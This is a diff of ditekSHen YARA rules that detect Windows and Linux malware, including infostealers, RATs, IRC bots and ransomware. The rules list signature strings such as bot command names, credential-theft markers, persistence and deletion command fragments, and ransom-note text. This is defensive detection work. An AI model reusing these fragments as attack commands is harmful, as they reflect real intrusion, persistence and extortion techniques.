"PRIVMSG %s :%s" fullword ascii + $s5 = "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" fullword ascii + $m1 = "saving %s to %s" ascii + $m2 = "visit number %u failed" ascii + $m3 = "sending %s packets of %s bytes to %s with a delay of %s" ascii + $m4 = "file executed" ascii + $m5 = "packets sent" ascii + $m6 = "upgrading to %s" ascii + $m7 = "rebooting..." ascii + $c1 = "!@remove" fullword ascii + $c2 = "!@restart" fullword ascii + $c3 = "!@reboot" fullword ascii + $c4 = "!@rndnick" fullword ascii + $c5 = "!@exit" fullword ascii + $c6 = "!@sysinfo" fullword ascii + $c7 = "!@upgrade" fullword ascii + $c8 = "!@login" fullword ascii + $c9 = "!@run" fullword ascii + $c10 = "!@webdl" fullword ascii + $c11 = "!@cycle" fullword ascii + $c12 = "!@clone" fullword ascii + $c13 = "!@visit" fullword ascii + $c14 = "!@udp" fullword ascii + $c15 = "!@nick" fullword ascii + $c16 = "!@say" fullword ascii + $c17 = "!@quit" fullword ascii + $c18 = "!@part" fullword ascii + $c19 = "!@join" fullword ascii + $c20 = "!@raw" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and ( all of ($x*) or all of ($s*) or all of ($m*) or (10 of ($c*) and (1 of ($x*) or 3 of ($s*) or 2 of ($m*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Worldwind : FILE +rule DITEKSHEN_MALWARE_Win_Sweetystealer : FILE { meta: - description = "Detects WorldWind infostealer" + description = "Detects SweetyStealer" author = "ditekSHen" - id = "226f591a-dc06-54f5-96ae-d142f624ff71" - date = "2024-09-06" - modified = "2024-09-06" + id = "21dd1706-2cb5-5b27-ad3a-c3de8e6fb333" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9705-L9726" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9bb04fad460193cd877ea7f2de9337f69aadda01aee6c79f0a23cdf564b1e6c8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7590-L7608" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ecf22240b47af077055260faba0406721f1b4cc5ed04180285df0de86c4e1241" score = 75 quality = 75 tags = "FILE" strings: - $c1 = /WorldWind(\s)?Stealer/ ascii wide - $x2 = "@FlatLineStealer" ascii wide - $x3 = "@CashOutGangTalk" ascii wide - $m1 = ".Passwords.Targets." ascii - $m2 = ".Modules.Keylogger" ascii - $m3 = ".Modules.Clipper" ascii - $m4 = ".Modules.Implant" ascii - $s1 = "--- Clipper" wide - $s2 = "Downloading file: \"{file}\"" wide - $s3 = "/bot{0}/getUpdates?offset={1}" wide - $s4 = "send command to bot!" wide - $s5 = " *Keylogger " fullword wide - $s6 = "*Stealer" wide - $s7 = "Bot connected" wide + $s1 = "SWEETY STEALER" wide + $s2 = "\\SWEETYLOG.zip" fullword wide + $s3 = "\\SWEETY STEALER\\SWEETY\\" ascii + $s4 = "\\Sweety" fullword wide + $s5 = "SWEETYSTEALER." ascii + $s6 = "in Virtual Environment, so we prevented stealing" wide + $s7 = ":purple_square:" wide + $f1 = "b__" ascii + $f2 = "b__" ascii + $f3 = "b__" ascii + $f4 = "k__" ascii condition: - uint16(0)==0x5a4d and 1 of ($c*) and (1 of ($x*) or 2 of ($m*) or 3 of ($s*)) + uint16(0)==0x5a4d and 3 of ($s*) or (3 of ($f*) and 1 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Prynt : FILE +rule DITEKSHEN_MALWARE_Win_Genircbot : FILE { meta: - description = "Detects Prynt infostealer" + description = "Detects generic IRCBots" author = "ditekSHen" - id = "844fd100-b04e-5ff0-9fab-d45f48b55bcc" - date = "2024-09-06" - modified = "2024-09-06" + id = "e1faa1dd-bbf5-5208-97d6-a6e8597d39bc" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9728-L9749" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "84f2b33285ab1d129a62940a02990639cc8f7c92d490d7257e6aed9170d1e34e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7610-L7626" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cc7f4599148c45fdf755c07530ae4846b7e283b5c1001c121f9ea05279997dc1" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $c1 = /Prynt(\s)?Stealer/ ascii wide - $x2 = "@FlatLineStealer" ascii wide - $x3 = "@CashOutGangTalk" ascii wide - $m1 = ".Passwords.Targets." ascii - $m2 = ".Modules.Keylogger" ascii - $m3 = ".Modules.Clipper" ascii - $m4 = ".Modules.Implant" ascii - $s1 = "--- Clipper" wide - $s2 = "Downloading file: \"{file}\"" wide - $s3 = "/bot{0}/getUpdates?offset={1}" wide - $s4 = "send command to bot!" wide - $s5 = " *Keylogger " fullword wide - $s6 = "*Stealer" wide - $s7 = "Bot connected" wide + $s1 = "@login" ascii nocase + $s2 = "PRIVMSG" fullword ascii + $s3 = "JOIN" fullword ascii + $s4 = "PING :" fullword ascii + $s5 = "NICK" fullword ascii + $s6 = "USER" fullword ascii + $x1 = "irc.danger.net" fullword ascii nocase + $x2 = "evilBot" fullword ascii nocase + $x3 = "#evilChannel" fullword ascii nocase condition: - uint16(0)==0x5a4d and 1 of ($c*) and (1 of ($x*) or 2 of ($m*) or 3 of ($s*)) + uint16(0)==0x5a4d and ( all of ($s*) or 2 of ($x*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Darkeye : FILE +rule DITEKSHEN_MALWARE_Win_Nitro : FILE { meta: - description = "Detects DarkEye infostealer" + description = "Detects Nitro Ransomware" author = "ditekSHen" - id = "5296fe28-b54e-5d0f-aa2f-2050db585d82" - date = "2024-09-06" - modified = "2024-09-06" + id = "3edb62e0-0544-5291-a949-a45fdf881c7e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9751-L9770" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5496dcbfe075a4030a446027765186e9dd1931561a29a481139281e1708ce87d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7628-L7652" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "03da21ece2de530a9c2ba08a9e44c9a92bc9ca0a6d4ac9507899d1f3dcd03e37" score = 75 - quality = 75 + quality = 69 tags = "FILE" strings: - $c1 = /Prynt(\s)?Stealer/ ascii wide - $c2 = /WorldWind(\s)?Stealer/ ascii wide - $c3 = "ToxicEye" ascii wide - $x2 = "@FlatLineStealer" ascii wide - $x3 = "@CashOutGangTalk" ascii wide - $s1 = "--- Clipper" wide - $s2 = "Downloading file: \"{file}\"" wide - $s3 = "/bot{0}/getUpdates?offset={1}" wide - $s4 = "send command to bot!" wide - $s5 = " *Keylogger " fullword wide - $s6 = "*Stealer" wide - $s7 = "Bot connected" wide + $x1 = ".givemenitro" wide + $x2 = "Nitro Ransomware" ascii wide + $x3 = "\\NitroRansomware.pdb" ascii + $x4 = "NitroRansomware" ascii wide nocase + $s1 = "Valid nitro code was received" wide + $s2 = "discord nitro" ascii wide nocase + $s3 = "Starting file encryption" wide + $s4 = "NR_decrypt.txt" wide + $s5 = "open it unless you have the decryption key." ascii + $s6 = "b__" ascii + $s7 = "b__" ascii + $s8 = "DECRYPT_PASSWORD" fullword ascii + $s9 = "IsEncrypted" fullword ascii + $s10 = "CmdProcess_OutputDataReceived" fullword ascii + $s11 = "encryptedFileLog" fullword ascii + $s12 = "Encrypting:" fullword wide + $s13 = "decryption key. If you do so, your files may get corrupted" ascii condition: - uint16(0)==0x5a4d and not any of ($c*) and ((1 of ($x*) and 2 of ($s*)) or (4 of ($s*))) + uint16(0)==0x5a4d and (3 of ($x*) or (3 of ($s*) and 1 of ($x*)) or (7 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Invalidprinter : FILE +rule DITEKSHEN_MALWARE_Win_Nanocore : FILE { meta: - description = "Invalid Printer (in2al5d p3in4er) Loader" + description = "Detects NanoCore" author = "ditekSHen" - id = "9b0a59e1-8105-5687-83b2-fb96229f59f9" - date = "2024-09-06" - modified = "2024-09-06" + id = "931b98f6-df2b-538b-bc49-ecbbd24334da" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9772-L9782" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d14d53b2a73952244641f4e68a3dd5af8cb1e2bfc5936f300f9347b4881ceeb8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7654-L7681" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6336260e0af2b4b51338ee066f41b7c58aa134a6c03ca110db7e088edf2b65a7" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.InvalidPrinter" strings: - $s1 = "in2al5d p3in4er" fullword ascii - $s2 = "CreateDXGIFactory" fullword ascii + $x1 = "NanoCore Client" fullword ascii + $x2 = "NanoCore.ClientPlugin" fullword ascii + $x3 = "NanoCore.ClientPluginHost" fullword ascii + $i1 = "IClientApp" fullword ascii + $i2 = "IClientData" fullword ascii + $i3 = "IClientNetwork" fullword ascii + $i4 = "IClientAppHost" fullword ascii + $i5 = "IClientDataHost" fullword ascii + $i6 = "IClientLoggingHost" fullword ascii + $i7 = "IClientNetworkHost" fullword ascii + $i8 = "IClientUIHost" fullword ascii + $i9 = "IClientNameObjectCollection" fullword ascii + $i10 = "IClientReadOnlyNameObjectCollection" fullword ascii + $s1 = "ClientPlugin" fullword ascii + $s2 = "EndPoint" fullword ascii + $s3 = "IPAddress" fullword ascii + $s4 = "IPEndPoint" fullword ascii + $s5 = "IPHostEntr" fullword ascii + $s6 = "get_ClientSettings" fullword ascii + $s7 = "get_Connected" fullword ascii condition: - uint16(0)==0x5a4d and filesize <15000KB and all of them + uint16(0)==0x5a4d and (2 of ($x*) or 8 of ($i*) or all of ($s*) or (1 of ($x*) and (3 of ($i*) or 2 of ($s*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Raccoonv2 : FILE +rule DITEKSHEN_MALWARE_Win_Satan : FILE { meta: - description = "Detects Raccoon Stealer 2.0, also referred to as RecordBreaker" + description = "Detects Satan ransomware" author = "ditekSHen" - id = "2fc8313f-42f4-5b7e-8ae6-20455f736064" - date = "2024-09-06" - modified = "2024-09-06" + id = "f0a9369e-a3d7-5770-b490-4c9a919abb82" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9784-L9805" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d47bb9051923147010452bcd6e7c370c2ff9ea9095bcb920b64f69873b15ec16" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7683-L7709" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e50daa88e0067a0f00329c6369c0334bd282fb102c91ba5ca770da97851d6d2e" score = 75 - quality = 25 + quality = 50 tags = "FILE" strings: - $f1 = "sgnl_" fullword ascii - $f2 = "tlgrm_" fullword ascii - $f3 = "ews_" fullword ascii - $f4 = "grbr_" fullword ascii - $f5 = "dscrd_" fullword ascii - $f6 = "wlts_" fullword ascii - $f7 = "scrnsht_" fullword ascii - $f8 = "sstmnfo_" fullword ascii - $s1 = "machineId=" fullword ascii - $s2 = "&configId=" fullword ascii - $s3 = "URL:%s" fullword ascii - $s4 = "USR:%s" fullword ascii - $s5 = "PASS:%s" fullword ascii - $s6 = "Content-Type: application/x-object" fullword ascii + $s1 = "S:(ML;;NRNWNX;;;LW)" fullword wide + $s2 = "recycle.bin" fullword wide + $s3 = "tmp_" fullword wide + $s4 = "%s%08x.%s" fullword wide + $s5 = "\"%s\" %s" fullword wide + $s6 = "/c \"%s\"" fullword wide + $s7 = "Global\\" fullword wide + $s8 = "rd /S /Q \"%s\"" fullword ascii + $s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)" fullword ascii + $e1 = "*pdf*" fullword wide + $e2 = "*rtf*" fullword wide + $e3 = "*doc*" fullword wide + $e4 = "*docx*" fullword wide + $e5 = "*xlsx*" fullword wide + $e6 = "*pptx*" fullword wide + $e7 = "*moneywell*" fullword wide + $o1 = { 56 8d 54 24 34 b9 9e f0 ea be e8 c1 f9 ff ff 8d } + $o2 = { b9 34 f6 40 00 e8 ea 0b 00 00 85 c0 0f 84 91 } + $o3 = { 53 8d 84 24 34 01 00 00 b9 01 00 00 80 50 a1 64 } condition: - (( uint16(0)==0x5a4d and (4 of ($f*) or all of ($s*) or 7 of them )) or 10 of them ) + uint16(0)==0x5a4d and ((8 of ($s*) and 4 of ($e*)) or all of ($s*) or ( all of ($e*) and 5 of ($s*)) or ( all of ($o*) and 8 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Truebot : FILE +rule DITEKSHEN_MALWARE_Win_Neshta : FILE { meta: - description = "Detects TrueBot" + description = "Detects Neshta" author = "ditekSHen" - id = "7210a0bd-d310-55bf-bb0c-14cadb59bd67" - date = "2024-09-06" - modified = "2024-09-06" + id = "b96ee19e-b631-57fd-bf8a-67d790202c46" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9807-L9827" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a92141ef0aa7d68b3594a0f56c0370498fe5751a472c9011ac8b92ae46e88e53" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7711-L7720" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7967c1154f652e28e541058a7b7f61aa077cfaf6be58282e1de68d9a6088c1ac" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "%s\\rundll32.exe" fullword wide - $s2 = "ChkdskExs" fullword wide - $s3 = "n=%s&o=%s&a=%d&u=%s&p=%s&d=%s" ascii - $s4 = "KLLS" fullword ascii - $s5 = "%s\\%08x-%08x.ps1" fullword ascii - $s6 = ".JSONIP" ascii - $s7 = "CreateProcessAsUserW res %d err %d" fullword ascii - $s8 = "ldr_sys64.dll" fullword ascii - $s9 = "SVCHOST" fullword ascii - $s10 = "WINLOGON" fullword ascii - $s11 = { 67 6f 6f 67 6c 65 2e 63 6f 6d 00 00 00 00 00 00 - 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 - 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 } + $s1 = "Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus." fullword ascii + $s2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Lummastealer : FILE +rule DITEKSHEN_MALWARE_Linux_Hellokitty : FILE { meta: - description = "Detects Lumma Stealer" + description = "Detects Linux version of HelloKitty ransomware" author = "ditekSHen" - id = "b54521ab-4a31-5c1c-8ef2-b08b0f713693" - date = "2034-02-17" - date = "2034-02-17" - modified = "2024-09-06" + id = "bb228937-8cd8-5fb8-aaed-3bd539ae96f2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9829-L9854" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "74014c5bcc85977b90faed93b348c34e47ee033b06c2f145348ca9c54c27bda5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7722-L7746" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bcb1188d616b29fa535e757a37476435a3061d27e143339413f6829876701868" score = 75 quality = 73 tags = "FILE" - clamav1 = "MALWARE.Win.Trojan.LummaStealer" strings: - $x1 = /Lum[0-9]{3}xedmaC2,\sBuild/ ascii - $x2 = /LID\(Lu[0-9]{3}xedmma\sID\):/ ascii - $s1 = /os_c[0-9]{3}xedrypt\.encry[0-9]{3}xedpted_key/ fullword ascii - $s2 = "c2sock" wide - $s3 = "c2conf" wide - $s4 = "TeslaBrowser/" wide - $s5 = "Software.txt" fullword wide - $s6 = "SysmonDrv" fullword - $s7 = "*.eml" fullword wide nocase - $s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide - $s9 = "- Screen Resoluton:" ascii - $s10 = "lid=%s" ascii - $s11 = "&ver=" ascii - $s12 = "769cb9aa22f4ccc412f9cbc81feedd" fullword wide - $s13 = "gapi-node.io" fullword ascii + $s1 = "exec_pipe:%s" ascii + $s2 = "Error InitAPI !!!" fullword ascii + $s3 = "No Files Found !!!" fullword ascii + $s4 = "Error open log File:%s" fullword ascii + $s5 = "%ld - Files Found " fullword ascii + $s6 = "Total VM run on host:" fullword ascii + $s7 = "error:%d open:%s" fullword ascii + $s8 = "work.log" fullword ascii + $s9 = "esxcli vm process kill" ascii + $s10 = "readdir64" fullword ascii + $s11 = "%s_%d.block" fullword ascii + $s12 = "EVP_EncryptFinal_ex" fullword ascii + $s13 = ".README_TO_RESTORE" fullword ascii + $m1 = "COMPROMISED AND YOUR SENSITIVE PRIVATE INFORMATION WAS STOLEN" ascii nocase + $m2 = "damage them without special software" ascii nocase + $m3 = "leaking or being sold" ascii nocase + $m4 = "Data will be Published and/or Sold" ascii nocase condition: - uint16(0)==0x5a4d and ( all of ($x*) or (1 of ($x*) and 2 of ($s*)) or 5 of ($s*) or 7 of them ) + uint16(0)==0x457f and (6 of ($s*) or (2 of ($m*) and 2 of ($s*)) or 8 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Xworm : FILE +rule DITEKSHEN_MALWARE_Win_Blackmatter : FILE { meta: - description = "Detects XWorm" + description = "Detects BlackMatter ransomware" author = "ditekSHen" - id = "bf9115a7-850a-5326-860c-a9a71bc7e50c" - date = "2024-09-06" - modified = "2024-09-06" + id = "8883e652-edab-5cbf-a4fa-963b437447d9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9856-L9882" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5a86c2f0a188135e53d86c176806a208abbe3dd830bde364016859ffa5294bd7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7748-L7767" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4558002b424f7102f67fc44dfc37ac20f6013e25ae827c6aee0fc37231e2fa72" score = 75 - quality = 73 + quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.XWorm" strings: - $x1 = "XWorm " wide nocase - $x2 = /XWorm\s(V|v)\d+\.\d+/ fullword wide - $s1 = "RunBotKiller" fullword wide - $s2 = "XKlog.txt" fullword wide - $s3 = /(shell|reg)fuc/ fullword wide - $s4 = "closeshell" fullword ascii - $s5 = { 62 00 79 00 70 00 73 00 73 00 00 ?? 63 00 61 00 6c 00 6c 00 75 00 61 00 63 00 00 ?? 73 00 63 00 } - $s6 = { 44 00 44 00 6f 00 73 00 54 00 00 ?? 43 00 69 00 6c 00 70 00 70 00 65 00 72 00 00 ?? 50 00 45 00 } - $s7 = { 69 00 6e 00 6a 00 52 00 75 00 6e 00 00 ?? 73 00 74 00 61 00 72 00 74 00 75 00 73 00 62 } - $s8 = { 48 6f 73 74 00 50 6f 72 74 00 75 70 6c 6f 61 64 65 72 00 6e 61 6d 65 65 65 00 4b 45 59 00 53 50 4c 00 4d 75 74 65 78 78 00 } - $v2_1 = "PING!" fullword wide - $v2_2 = "Urlhide" fullword wide - $v2_3 = /PC(Restart|Shutdown)/ fullword wide - $v2_4 = /(Start|Stop)(DDos|Report)/ fullword wide - $v2_5 = /Offline(Get|Keylogger)/ wide - $v2_6 = "injRun" fullword wide - $v2_7 = "Xchat" fullword wide - $v2_8 = "UACFunc" fullword ascii wide + $s1 = "C:\\Windows\\System32\\*.drv" fullword wide + $s2 = "NYbr-Vk@" fullword ascii + $s3 = ":7:=:H:Q:W:\\:b:&;O;^;v;" fullword ascii + $o1 = { b0 34 aa fe c0 e2 fb b9 03 } + $o2 = { fe 00 ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 } + $o3 = { 6a 00 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe ff } + $o4 = { ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe } + $o5 = { 53 56 57 8d 85 70 ff ff ff 83 c0 0f 83 e0 f0 89 } + $o6 = { c7 85 68 ff ff ff 00 04 00 00 8b 85 6c ff ff ff } condition: - uint16(0)==0x5a4d and ((1 of ($x*) and (3 of ($s*) or 3 of ($v2*))) or 6 of them ) + uint16(0)==0x5a4d and ( all of ($s*) and all of ($o*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Clipbanker03 : FILE +rule DITEKSHEN_MALWARE_Win_Dlinjector04 : FILE { meta: - description = "Detects ClipBanker" + description = "Detects downloader / injector" author = "ditekSHen" - id = "57ba7d33-eba4-5bc1-9893-5441e439b900" - date = "2024-09-06" - modified = "2024-09-06" + id = "fe423aee-6ff4-5fd0-9fa2-51dd0c27f54b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9884-L9904" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "29bbb833c9aecc18b398b8c0d80649994f4992277d1aa2ee4ae8e319b59125d5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7769-L7790" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ab9a047e53dec2cc5986522636783b5cb8aae7fc0297292d017ec22ee5750cce" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = "UNIC_KEY" fullword wide - $s2 = "[StartUp]" fullword wide - $s3 = "[Kill]" fullword wide - $s4 = "[antivm]" fullword wide - $s5 = "AntiVM" fullword ascii - $s6 = "AntiKill" fullword ascii - $s7 = "hWndRemove" fullword ascii - $s8 = "/Clip(watch|Chang|Mon)/" fullword ascii - $w1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide - $w2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" fullword wide - $w3 = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" fullword wide - $w4 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" fullword wide - $w5 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide + $s1 = "Runner" fullword ascii + $s2 = "DownloadPayload" fullword ascii + $s3 = "RunOnStartup" fullword ascii + $a1 = "Antis" fullword ascii + $a2 = "antiVM" fullword ascii + $a3 = "antiSandbox" fullword ascii + $a4 = "antiDebug" fullword ascii + $a5 = "antiEmulator" fullword ascii + $a6 = "enablePersistence" fullword ascii + $a7 = "enableFakeError" fullword ascii + $a8 = "DetectVirtualMachine" fullword ascii + $a9 = "DetectSandboxie" fullword ascii + $a10 = "DetectDebugger" fullword ascii + $a11 = "CheckEmulator" fullword ascii condition: - uint16(0)==0x5a4d and (5 of ($s*) or all of ($w*) or 6 of them ) + uint16(0)==0x5a4d and (( all of ($s*) and 5 of ($a*)) or 10 of ($a*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dotrunpex : FILE +rule DITEKSHEN_MALWARE_Win_Darkcomet : FILE { meta: - description = "Detects dotRunpeX injector" + description = "Detects DarkComet" author = "ditekSHen" - id = "4845edc1-110c-59a2-ace0-57a62b1e69e8" - date = "2024-09-06" - modified = "2024-09-06" + id = "ae2412df-adae-5640-9404-7b093c5095b4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9906-L9918" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d7f802f233b2b4ff2c250bb8e96649f307bbb3457c78004751401b3ea7f531a0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7792-L7812" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "444df3c914c47500018614af10036864b459e7873daf079b684352dbe52f0486" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $s1 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" fullword wide - $s2 = "KoiVM" ascii - $s3 = "RunpeX.Stub.Framework" wide - $s4 = "ExceptionServices.ExceptionDispatchInfo" wide - $s5 = "Kernel32.Dll" wide + $s1 = "%s, ClassID: %s" ascii + $s2 = "%s, ProgID: \"%s\"" ascii + $s3 = "#KCMDDC51#" ascii + $s4 = "#BOT#VisitUrl" ascii + $s5 = "#BOT#OpenUrl" ascii + $s6 = "#BOT#Ping" ascii + $s7 = "#BOT#RunPrompt" ascii + $s8 = "#BOT#CloseServer" ascii + $s9 = "#BOT#SvrUninstall" ascii + $s10 = "#BOT#URLUpdate" ascii + $s11 = "#BOT#URLDownload" ascii + $s12 = /BTRESULT(Close|Download|HTTP|Mass|Open|Ping\|Respond|Run|Syn|UDP|Uninstall\|uninstall|Update|Visit)/ ascii + $s13 = "dclogs\\" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Cyberstealer : FILE +rule DITEKSHEN_MALWARE_Win_Macoute : FILE { meta: - description = "Detects CyberStealer infostealer" + description = "Detects Macoute" author = "ditekSHen" - id = "cb02013f-ffb2-5a17-9d6e-1d19b0e98fb8" - date = "2024-09-06" - modified = "2024-09-06" + id = "0ecfb923-2e51-544e-984d-efdeeb175727" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9920-L9941" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "72413b68fa1381656202165dcd878761727e7caf0f15ccd65f3f2f842243a1f6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7814-L7836" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1dffa48fe6c0ac053509b5f5994d323fd72d090da0f077b52c9bc33df6997964" score = 75 - quality = 71 + quality = 75 tags = "FILE" strings: - $x1 = "\\Cyber Stealer\\" ascii - $s1 = "[Virtualization]" fullword wide - $s2 = "\"encryptedPassword\":\"([^\"]+)\"" fullword wide - $s3 = "CreditCard" fullword ascii - $s4 = "DecryptPassword" fullword ascii - $s5 = "_modTime" fullword ascii - $s6 = "_pathname" fullword ascii - $s7 = "_pathnameInZip" fullword ascii - $s8 = "GetBookmarksDBPath" fullword ascii - $s9 = "GrabberImages" fullword 